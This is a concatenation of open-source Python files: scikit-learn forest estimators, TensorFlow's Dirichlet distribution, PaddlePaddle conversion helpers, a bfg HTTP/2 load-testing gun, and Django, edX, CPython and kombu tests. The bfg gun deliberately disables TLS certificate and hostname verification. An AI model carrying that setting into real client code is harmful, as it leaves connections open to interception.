`oob_decision_function_` might contain NaN.
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
See also
--------
sklearn.tree.ExtraTreeClassifier : Base classifier for this ensemble.
RandomForestClassifier : Ensemble Classifier based on trees with optimal
splits.
"""
def __init__(self,
n_estimators=10,
criterion="gini",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
bootstrap=False,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None):
super(ExtraTreesClassifier, self).__init__(
base_estimator=ExtraTreeClassifier(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes", "random_state"),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
class ExtraTreesRegressor(ForestRegressor):
"""An extra-trees regressor.
This class implements a meta estimator that fits a number of
randomized decision trees (a.k.a. extra-trees) on various sub-samples
of the dataset and use averaging to improve the predictive accuracy
and control over-fitting.
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : integer, optional (default=10)
The number of trees in the forest.
criterion : string, optional (default="mse")
The function to measure the quality of a split. The only supported
criterion is "mse" for the mean squared error.
Note: this parameter is tree-specific.
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
Note: this parameter is tree-specific.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
Note: this parameter is tree-specific.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
Note: this parameter is tree-specific.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples in newly created leaves. A split is
discarded if after the split, one of the leaves would contain less then
``min_samples_leaf`` samples.
Note: this parameter is tree-specific.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
Note: this parameter is tree-specific.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
Note: this parameter is tree-specific.
bootstrap : boolean, optional (default=False)
Whether bootstrap samples are used when building trees.
Note: this parameter is tree-specific.
oob_score : bool
Whether to use out-of-bag samples to estimate
the generalization error.
n_jobs : integer, optional (default=1)
The number of jobs to run in parallel for both `fit` and `predict`.
If -1, then the number of jobs is set to the number of cores.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity of the tree building process.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest.
Attributes
----------
estimators_ : list of DecisionTreeRegressor
The collection of fitted sub-estimators.
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
n_features_ : int
The number of features.
n_outputs_ : int
The number of outputs.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_prediction_ : array of shape = [n_samples]
Prediction computed with out-of-bag estimate on the training set.
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
See also
--------
sklearn.tree.ExtraTreeRegressor: Base estimator for this ensemble.
RandomForestRegressor: Ensemble regressor using trees with optimal splits.
"""
def __init__(self,
n_estimators=10,
criterion="mse",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
bootstrap=False,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False):
super(ExtraTreesRegressor, self).__init__(
base_estimator=ExtraTreeRegressor(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"random_state"),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
class RandomTreesEmbedding(BaseForest):
"""An ensemble of totally random trees.
An unsupervised transformation of a dataset to a high-dimensional
sparse representation. A datapoint is coded according to which leaf of
each tree it is sorted into. Using a one-hot encoding of the leaves,
this leads to a binary coding with as many ones as there are trees in
the forest.
The dimensionality of the resulting representation is
``n_out <= n_estimators * max_leaf_nodes``. If ``max_leaf_nodes == None``,
the number of leaf nodes is at most ``n_estimators * 2 ** max_depth``.
Read more in the :ref:`User Guide <random_trees_embedding>`.
Parameters
----------
n_estimators : int
Number of trees in the forest.
max_depth : int
The maximum depth of each tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples in newly created leaves. A split is
discarded if after the split, one of the leaves would contain less then
``min_samples_leaf`` samples.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
sparse_output : bool, optional (default=True)
Whether or not to return a sparse CSR matrix, as default behavior,
or to return a dense array compatible with dense pipeline operators.
n_jobs : integer, optional (default=1)
The number of jobs to run in parallel for both `fit` and `predict`.
If -1, then the number of jobs is set to the number of cores.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity of the tree building process.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest.
Attributes
----------
estimators_ : list of DecisionTreeClassifier
The collection of fitted sub-estimators.
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
.. [2] Moosmann, F. and Triggs, B. and Jurie, F. "Fast discriminative
visual codebooks using randomized clustering forests"
NIPS 2007
"""
def __init__(self,
n_estimators=10,
max_depth=5,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_leaf_nodes=None,
sparse_output=True,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False):
super(RandomTreesEmbedding, self).__init__(
base_estimator=ExtraTreeRegressor(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"random_state"),
bootstrap=False,
oob_score=False,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start)
self.criterion = 'mse'
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = 1
self.max_leaf_nodes = max_leaf_nodes
self.sparse_output = sparse_output
def _set_oob_score(self, X, y):
raise NotImplementedError("OOB score not supported by tree embedding")
def fit(self, X, y=None, sample_weight=None):
"""Fit estimator.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
The input samples. Use ``dtype=np.float32`` for maximum
efficiency. Sparse matrices are also supported, use sparse
``csc_matrix`` for maximum efficiency.
Returns
-------
self : object
Returns self.
"""
self.fit_transform(X, y, sample_weight=sample_weight)
return self
def fit_transform(self, X, y=None, sample_weight=None):
"""Fit estimator and transform dataset.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Input data used to build forests. Use ``dtype=np.float32`` for
maximum efficiency.
Returns
-------
X_transformed : sparse matrix, shape=(n_samples, n_out)
Transformed dataset.
"""
# ensure_2d=False because there are actually unit test checking we fail
# for 1d.
X = check_array(X, accept_sparse=['csc'], ensure_2d=False)
if issparse(X):
# Pre-sort indices to avoid that each individual tree of the
# ensemble sorts the indices.
X.sort_indices()
rnd = check_random_state(self.random_state)
y = rnd.uniform(size=X.shape[0])
super(RandomTreesEmbedding, self).fit(X, y,
sample_weight=sample_weight)
self.one_hot_encoder_ = OneHotEncoder(sparse=self.sparse_output)
return self.one_hot_encoder_.fit_transform(self.apply(X))
def transform(self, X):
"""Transform dataset.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Input data to be transformed. Use ``dtype=np.float32`` for maximum
efficiency. Sparse matrices are also supported, use sparse
``csr_matrix`` for maximum efficiency.
Returns
-------
X_transformed : sparse matrix, shape=(n_samples, n_out)
Transformed dataset.
"""
return self.one_hot_encoder_.transform(self.apply(X))
| bsd-3-clause |
mancoast/CPythonPyc_test | cpython/244_test_macostools.py | 14 | 2371 | # Copyright (C) 2003 Python Software Foundation
import unittest
import macostools
import Carbon.File
import MacOS
import os
import sys
from test import test_support
TESTFN2 = test_support.TESTFN + '2'
class TestMacostools(unittest.TestCase):
def setUp(self):
fp = open(test_support.TESTFN, 'w')
fp.write('hello world\n')
fp.close()
rfp = MacOS.openrf(test_support.TESTFN, '*wb')
rfp.write('goodbye world\n')
rfp.close()
def tearDown(self):
try:
os.unlink(test_support.TESTFN)
except:
pass
try:
os.unlink(TESTFN2)
except:
pass
def compareData(self):
fp = open(test_support.TESTFN, 'r')
data1 = fp.read()
fp.close()
fp = open(TESTFN2, 'r')
data2 = fp.read()
fp.close()
if data1 != data2:
return 'Data forks differ'
rfp = MacOS.openrf(test_support.TESTFN, '*rb')
data1 = rfp.read(1000)
rfp.close()
rfp = MacOS.openrf(TESTFN2, '*rb')
data2 = rfp.read(1000)
rfp.close()
if data1 != data2:
return 'Resource forks differ'
return ''
def test_touched(self):
# This really only tests that nothing unforeseen happens.
macostools.touched(test_support.TESTFN)
def test_copy(self):
try:
os.unlink(TESTFN2)
except:
pass
macostools.copy(test_support.TESTFN, TESTFN2)
self.assertEqual(self.compareData(), '')
def test_mkalias(self):
try:
os.unlink(TESTFN2)
except:
pass
macostools.mkalias(test_support.TESTFN, TESTFN2)
fss, _, _ = Carbon.File.ResolveAliasFile(TESTFN2, 0)
self.assertEqual(fss.as_pathname(), os.path.realpath(test_support.TESTFN))
def test_mkalias_relative(self):
if not os.path.exists(sys.prefix):
return
try:
os.unlink(TESTFN2)
except:
pass
macostools.mkalias(test_support.TESTFN, TESTFN2, sys.prefix)
fss, _, _ = Carbon.File.ResolveAliasFile(TESTFN2, 0)
self.assertEqual(fss.as_pathname(), os.path.realpath(test_support.TESTFN))
def test_main():
test_support.run_unittest(TestMacostools)
if __name__ == '__main__':
test_main()
| gpl-3.0 |
edx/edx-platform | cms/djangoapps/contentstore/management/commands/delete_orphans.py | 5 | 1695 | """Script for deleting orphans"""
from django.core.management.base import BaseCommand, CommandError
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from cms.djangoapps.contentstore.views.item import _delete_orphans
from xmodule.modulestore import ModuleStoreEnum
class Command(BaseCommand):
"""Command for deleting orphans"""
help = '''
Delete orphans from a MongoDB backed course. Takes two arguments:
<course_id>: the course id of the course whose orphans you want to delete
|--commit|: optional argument. If not provided, will dry run delete
'''
def add_arguments(self, parser):
parser.add_argument('course_id')
parser.add_argument('--commit', action='store_true', help='Commit to deleting the orphans')
def handle(self, *args, **options):
try:
course_key = CourseKey.from_string(options['course_id'])
except InvalidKeyError:
raise CommandError("Invalid course key.") # lint-amnesty, pylint: disable=raise-missing-from
if options['commit']:
print('Deleting orphans from the course:')
deleted_items = _delete_orphans(
course_key, ModuleStoreEnum.UserID.mgmt_command, options['commit']
)
print("Success! Deleted the following orphans from the course:")
print("\n".join(deleted_items))
else:
print('Dry run. The following orphans would have been deleted from the course:')
deleted_items = _delete_orphans(
course_key, ModuleStoreEnum.UserID.mgmt_command, options['commit']
)
print("\n".join(deleted_items))
| agpl-3.0 |
ryfeus/lambda-packs | Keras_tensorflow/source/tensorflow/contrib/distributions/python/ops/dirichlet.py | 11 | 9377 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Dirichlet distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import special_math_ops
_dirichlet_prob_note = """
Note that the input must be a non-negative tensor with dtype `dtype` and whose
shape can be broadcast with `self.alpha`. For fixed leading dimensions, the
last dimension represents counts for the corresponding Dirichlet distribution
in `self.alpha`. `x` is only legal if it sums up to one.
"""
class Dirichlet(distribution.Distribution):
"""Dirichlet distribution.
This distribution is parameterized by a vector `alpha` of concentration
parameters for `k` classes.
#### Mathematical details
The Dirichlet is a distribution over the standard n-simplex, where the
standard n-simplex is defined by:
```{ (x_1, ..., x_n) in R^(n+1) | sum_j x_j = 1 and x_j >= 0 for all j }```.
The distribution has hyperparameters `alpha = (alpha_1,...,alpha_k)`,
and probability mass function (prob):
```prob(x) = 1 / Beta(alpha) * prod_j x_j^(alpha_j - 1)```
where `Beta(x) = prod_j Gamma(x_j) / Gamma(sum_j x_j)` is the multivariate
beta function.
This class provides methods to create indexed batches of Dirichlet
distributions. If the provided `alpha` is rank 2 or higher, for
every fixed set of leading dimensions, the last dimension represents one
single Dirichlet distribution. When calling distribution
functions (e.g. `dist.prob(x)`), `alpha` and `x` are broadcast to the
same shape (if possible). In all cases, the last dimension of alpha/x
represents single Dirichlet distributions.
#### Examples
```python
alpha = [1, 2, 3]
dist = Dirichlet(alpha)
```
Creates a 3-class distribution, with the 3rd class is most likely to be drawn.
The distribution functions can be evaluated on x.
```python
# x same shape as alpha.
x = [.2, .3, .5]
dist.prob(x) # Shape []
# alpha will be broadcast to [[1, 2, 3], [1, 2, 3]] to match x.
x = [[.1, .4, .5], [.2, .3, .5]]
dist.prob(x) # Shape [2]
# alpha will be broadcast to shape [5, 7, 3] to match x.
x = [[...]] # Shape [5, 7, 3]
dist.prob(x) # Shape [5, 7]
```
Creates a 2-batch of 3-class distributions.
```python
alpha = [[1, 2, 3], [4, 5, 6]] # Shape [2, 3]
dist = Dirichlet(alpha)
# x will be broadcast to [[2, 1, 0], [2, 1, 0]] to match alpha.
x = [.2, .3, .5]
dist.prob(x) # Shape [2]
```
"""
def __init__(self,
alpha,
validate_args=False,
allow_nan_stats=True,
name="Dirichlet"):
"""Initialize a batch of Dirichlet distributions.
Args:
alpha: Positive floating point tensor with shape broadcastable to
`[N1,..., Nm, k]` `m >= 0`. Defines this as a batch of `N1 x ... x Nm`
different `k` class Dirichlet distributions.
validate_args: `Boolean`, default `False`. Whether to assert valid values
for parameters `alpha` and `x` in `prob` and `log_prob`. If `False`,
correct behavior is not guaranteed.
allow_nan_stats: `Boolean`, default `True`. If `False`, raise an
exception if a statistic (e.g. mean/mode/etc...) is undefined for any
batch member. If `True`, batch members with valid parameters leading to
undefined statistics will return NaN for this statistic.
name: The name to prefix Ops created by this distribution class.
Examples:
```python
# Define 1-batch of 2-class Dirichlet distributions,
# also known as a Beta distribution.
dist = Dirichlet([1.1, 2.0])
# Define a 2-batch of 3-class distributions.
dist = Dirichlet([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
```
"""
parameters = locals()
parameters.pop("self")
with ops.name_scope(name, values=[alpha]) as ns:
alpha = ops.convert_to_tensor(alpha, name="alpha")
with ops.control_dependencies([
check_ops.assert_positive(alpha),
check_ops.assert_rank_at_least(alpha, 1)
] if validate_args else []):
self._alpha = array_ops.identity(alpha, name="alpha")
self._alpha_sum = math_ops.reduce_sum(alpha,
reduction_indices=[-1],
keep_dims=False)
super(Dirichlet, self).__init__(
dtype=self._alpha.dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
is_continuous=True,
is_reparameterized=False,
parameters=parameters,
graph_parents=[self._alpha, self._alpha_sum],
name=ns)
@property
def alpha(self):
"""Shape parameter."""
return self._alpha
@property
def alpha_sum(self):
"""Sum of shape parameter."""
return self._alpha_sum
def _batch_shape(self):
return array_ops.shape(self.alpha_sum)
def _get_batch_shape(self):
return self.alpha_sum.get_shape()
def _event_shape(self):
return array_ops.gather(array_ops.shape(self.alpha),
[array_ops.rank(self.alpha) - 1])
def _get_event_shape(self):
return self.alpha.get_shape().with_rank_at_least(1)[-1:]
def _sample_n(self, n, seed=None):
gamma_sample = random_ops.random_gamma(
[n,], self.alpha, dtype=self.dtype, seed=seed)
return gamma_sample / math_ops.reduce_sum(
gamma_sample, reduction_indices=[-1], keep_dims=True)
@distribution_util.AppendDocstring(_dirichlet_prob_note)
def _log_prob(self, x):
x = ops.convert_to_tensor(x, name="x")
x = self._assert_valid_sample(x)
unnorm_prob = (self.alpha - 1.) * math_ops.log(x)
log_prob = math_ops.reduce_sum(
unnorm_prob, reduction_indices=[-1],
keep_dims=False) - special_math_ops.lbeta(self.alpha)
return log_prob
@distribution_util.AppendDocstring(_dirichlet_prob_note)
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _entropy(self):
entropy = special_math_ops.lbeta(self.alpha)
entropy += math_ops.digamma(self.alpha_sum) * (
self.alpha_sum - math_ops.cast(self.event_shape()[0], self.dtype))
entropy += -math_ops.reduce_sum(
(self.alpha - 1.) * math_ops.digamma(self.alpha),
reduction_indices=[-1],
keep_dims=False)
return entropy
def _mean(self):
return self.alpha / array_ops.expand_dims(self.alpha_sum, -1)
def _variance(self):
scale = self.alpha_sum * math_ops.sqrt(1. + self.alpha_sum)
alpha = self.alpha / scale
outer_prod = -math_ops.matmul(
array_ops.expand_dims(
alpha, dim=-1), # column
array_ops.expand_dims(
alpha, dim=-2)) # row
return array_ops.matrix_set_diag(outer_prod,
alpha * (self.alpha_sum / scale - alpha))
def _std(self):
return math_ops.sqrt(self._variance())
@distribution_util.AppendDocstring(
"""Note that the mode for the Dirichlet distribution is only defined
when `alpha > 1`. This returns the mode when `alpha > 1`,
and NaN otherwise. If `self.allow_nan_stats` is `False`, an exception
will be raised rather than returning `NaN`.""")
def _mode(self):
mode = ((self.alpha - 1.) /
(array_ops.expand_dims(self.alpha_sum, dim=-1) -
math_ops.cast(self.event_shape()[0], self.dtype)))
if self.allow_nan_stats:
nan = np.array(np.nan, dtype=self.dtype.as_numpy_dtype())
shape = array_ops.concat((self.batch_shape(), self.event_shape()), 0)
return array_ops.where(
math_ops.greater(self.alpha, 1.),
mode,
array_ops.fill(shape, nan, name="nan"))
else:
return control_flow_ops.with_dependencies([
check_ops.assert_less(
array_ops.ones((), dtype=self.dtype), self.alpha,
message="mode not defined for components of alpha <= 1")
], mode)
def _assert_valid_sample(self, x):
if not self.validate_args: return x
return control_flow_ops.with_dependencies([
check_ops.assert_positive(x),
distribution_util.assert_close(
array_ops.ones((), dtype=self.dtype),
math_ops.reduce_sum(x, reduction_indices=[-1])),
], x)
| mit |
direvius/bfg | bfg/guns/http2.py | 1 | 2875 | '''
Guns for HTTP/2
'''
import logging
from collections import namedtuple
from hyper import HTTP20Connection, tls
import ssl
from hyper.http20.exceptions import ConnectionError
from .base import GunBase
Http2Ammo = namedtuple("Http2Ammo", "method,uri,headers,body")
logger = logging.getLogger(__name__)
class HttpMultiGun(GunBase):
'''
Multi request gun. Only GET. Expects an array of (marker, request)
tuples in task.data. A stream is opened for every request first and
responses are readed after all streams have been opened. A sample is
measured for every action and for overall time for a whole batch.
The sample for overall time is marked with 'overall' in action field.
'''
SECTION = 'http_gun'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.base_address = self.get_option('target')
logger.info("Initialized http2 gun with target '%s'", self.base_address)
context = tls.init_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
self.conn = HTTP20Connection(self.base_address, secure=True, ssl_context=context)
def shoot(self, task):
logger.debug("Task: %s", task)
scenario = task.marker
subtasks = [
task._replace(data=missile[1], marker=missile[0])
for missile in task.data
]
streams = []
with self.measure(task) as overall_sw:
for subtask in subtasks:
with self.measure(subtask) as sw:
logger.debug("Request GET %s", subtask.data)
streams.append(
(subtask, self.conn.request('GET', subtask.data)))
sw.stop()
sw.scenario = scenario
sw.action = "request"
for (subtask, stream) in streams:
with self.measure(subtask) as sw:
logger.debug("Response for %s from %s ", subtask.data, stream)
try:
resp = self.conn.get_response(stream)
except (ConnectionError, KeyError) as e:
sw.stop()
# TODO: try to add a meaningful code here
sw.set_error(1)
overall_sw.set_error(1)
sw.ext["error"] = str(e)
overall_sw.ext.setdefault('error', []).append(str(e))
logger.warning("Error getting response: %s", str(e))
else:
sw.stop()
sw.set_code(str(resp.status))
sw.scenario = scenario
sw.action = "response"
overall_sw.stop()
overall_sw.scenario = scenario
overall_sw.action = "overall"
| mit |
PaddlePaddle/Paddle | python/paddle/fluid/dygraph/dygraph_to_static/variable_trans_func.py | 1 | 4696 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import six
import gast
from paddle.fluid import core
from paddle.fluid import unique_name
from paddle.fluid.framework import Variable
from paddle.fluid.layers import fill_constant
from paddle.fluid.layer_helper import LayerHelper
__all__ = [
'create_bool_as_type', 'create_fill_constant_node',
'create_static_variable_gast_node', 'data_layer_not_check',
'to_static_variable', 'to_static_variable_gast_node'
]
def data_layer_not_check(name, shape, dtype='float32', lod_level=0):
"""
This function creates a Tensor on the global block. The created Tensor
doesn't check the dtype and the shape of feed data because dygraph input
data can be various-length. This API is used in translating dygraph into
static graph.
Note:
The default :code:`stop_gradient` attribute of the Tensor created by
this API is true, which means the gradient won't be passed backward
through the data Tensor. Set :code:`var.stop_gradient = False` If
user would like to pass backward gradient.
Args:
name (str): The name/alias of the Tensor, see :ref:`api_guide_Name`
for more details.
shape (list|tuple): List|Tuple of integers declaring the shape. You can
set "None" at a dimension to indicate the dimension can be of any
size. For example, it is useful to set changeable batch size as "None"
dtype (np.dtype|VarType|str, optional): The type of the data. Supported
dtype: bool, float16, float32, float64, int8, int16, int32, int64,
uint8. Default: float32
lod_level (int, optional): The LoD level of the LoDTensor. Usually users
don't have to set this value. For more details about when and how to
use LoD level, see :ref:`user_guide_lod_tensor` . Default: 0
Returns:
Tensor: The global Tensor that gives access to the data.
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
return helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True,
lod_level=lod_level,
is_data=True,
need_check_feed=False)
def to_static_variable_gast_node(name):
func_code = "{} = paddle.jit.dy2static.to_static_variable({})".format(name,
name)
return gast.parse(func_code).body[0]
def create_static_variable_gast_node(name):
func_code = "{} = paddle.jit.dy2static\
.data_layer_not_check(name='{}', shape=[-1], dtype='float32')".format(
name, unique_name.generate(name))
return gast.parse(func_code).body[0]
def create_fill_constant_node(name, value):
func_code = "{} = paddle.fluid.layers.fill_constant(shape=[1], ".format(
name)
if isinstance(value, bool):
func_code += "dtype='bool', value={})".format(value)
return gast.parse(func_code).body[0]
if isinstance(value, float):
func_code += "dtype='float64', value={})".format(value)
return gast.parse(func_code).body[0]
if isinstance(value, int):
func_code += "dtype='int64', value={})".format(value)
return gast.parse(func_code).body[0]
def to_static_variable(x):
'''
Translate a Python Tensor to PaddlePaddle static graph Tensor
'''
if isinstance(x, bool):
return fill_constant(shape=[1], dtype='bool', value=x)
if isinstance(x, float):
return fill_constant(shape=[1], dtype='float64', value=x)
if isinstance(x, six.integer_types):
return fill_constant(shape=[1], dtype='int64', value=x)
return x
def create_bool_as_type(x, value=True):
'''
Create a bool variable, which type is the same as x.
'''
if isinstance(x, Variable):
return fill_constant(shape=[1], value=value, dtype="bool")
else:
return value
| apache-2.0 |
alexandrupirjol/django-filer | filer/tests/server_backends.py | 25 | 4610 | #-*- coding: utf-8 -*-
import time
import shutil
import os
from django.core.files.uploadedfile import SimpleUploadedFile
from django.http import HttpResponseNotModified, Http404
from django.test import TestCase
from django.utils.http import http_date
from filer import settings as filer_settings
from filer.models import File
from filer.server.backends.default import DefaultServer
from filer.server.backends.nginx import NginxXAccelRedirectServer
from filer.server.backends.xsendfile import ApacheXSendfileServer
from filer.tests.helpers import create_image
from filer.tests.utils import Mock
class BaseServerBackendTestCase(TestCase):
def setUp(self):
original_filename = 'testimage.jpg'
file_obj = SimpleUploadedFile(
name=original_filename,
content=create_image().tostring(),
content_type='image/jpeg')
self.filer_file = File.objects.create(
is_public=False,
file=file_obj,
original_filename=original_filename)
def tearDown(self):
self.filer_file.delete()
class DefaultServerTestCase(BaseServerBackendTestCase):
def test_normal(self):
server = DefaultServer()
request = Mock()
request.META = {}
response = server.serve(request, self.filer_file.file)
self.assertTrue(response.has_header('Last-Modified'))
def test_not_modified(self):
server = DefaultServer()
request = Mock()
request.META = {'HTTP_IF_MODIFIED_SINCE': http_date(time.time())}
response = server.serve(request, self.filer_file.file)
self.assertTrue(isinstance(response, HttpResponseNotModified))
def test_missing_file(self):
server = DefaultServer()
request = Mock()
request.META = {}
os.remove(self.filer_file.file.path)
self.assertRaises(Http404, server.serve, *(request, self.filer_file.file))
class NginxServerTestCase(BaseServerBackendTestCase):
def setUp(self):
super(NginxServerTestCase, self).setUp()
self.server = NginxXAccelRedirectServer(
location=filer_settings.FILER_PRIVATEMEDIA_STORAGE.location,
nginx_location='mylocation',
)
def test_normal(self):
request = Mock()
request.META = {}
response = self.server.serve(request, self.filer_file.file)
headers = dict(response.items())
self.assertTrue(response.has_header('X-Accel-Redirect'))
self.assertTrue(headers['X-Accel-Redirect'].startswith(self.server.nginx_location))
# make sure the file object was never opened (otherwise the whole delegating to nginx would kinda
# be useless)
self.assertTrue(self.filer_file.file.closed)
def test_missing_file(self):
"""
this backend should not even notice if the file is missing.
"""
request = Mock()
request.META = {}
os.remove(self.filer_file.file.path)
response = self.server.serve(request, self.filer_file.file)
headers = dict(response.items())
self.assertTrue(response.has_header('X-Accel-Redirect'))
self.assertTrue(headers['X-Accel-Redirect'].startswith(self.server.nginx_location))
self.assertTrue(self.filer_file.file.closed)
class XSendfileServerTestCase(BaseServerBackendTestCase):
def setUp(self):
super(XSendfileServerTestCase, self).setUp()
self.server = ApacheXSendfileServer()
def test_normal(self):
request = Mock()
request.META = {}
response = self.server.serve(request, self.filer_file.file)
headers = dict(response.items())
self.assertTrue(response.has_header('X-Sendfile'))
self.assertEqual(headers['X-Sendfile'], self.filer_file.file.path)
# make sure the file object was never opened (otherwise the whole delegating to nginx would kinda
# be useless)
self.assertTrue(self.filer_file.file.closed)
def test_missing_file(self):
"""
this backend should not even notice if the file is missing.
"""
request = Mock()
request.META = {}
os.remove(self.filer_file.file.path)
response = self.server.serve(request, self.filer_file.file)
headers = dict(response.items())
self.assertTrue(response.has_header('X-Sendfile'))
self.assertEqual(headers['X-Sendfile'], self.filer_file.file.path)
# make sure the file object was never opened (otherwise the whole delegating to nginx would kinda
# be useless)
self.assertTrue(self.filer_file.file.closed) | bsd-3-clause |
campbe13/openhatch | vendor/packages/kombu/kombu/tests/transport/virtual/test_exchange.py | 24 | 4859 | from __future__ import absolute_import
from kombu import Connection
from kombu.transport.virtual import exchange
from kombu.tests.case import Case, Mock
from kombu.tests.mocks import Transport
class ExchangeCase(Case):
type = None
def setUp(self):
if self.type:
self.e = self.type(Connection(transport=Transport).channel())
class test_Direct(ExchangeCase):
type = exchange.DirectExchange
table = [('rFoo', None, 'qFoo'),
('rFoo', None, 'qFox'),
('rBar', None, 'qBar'),
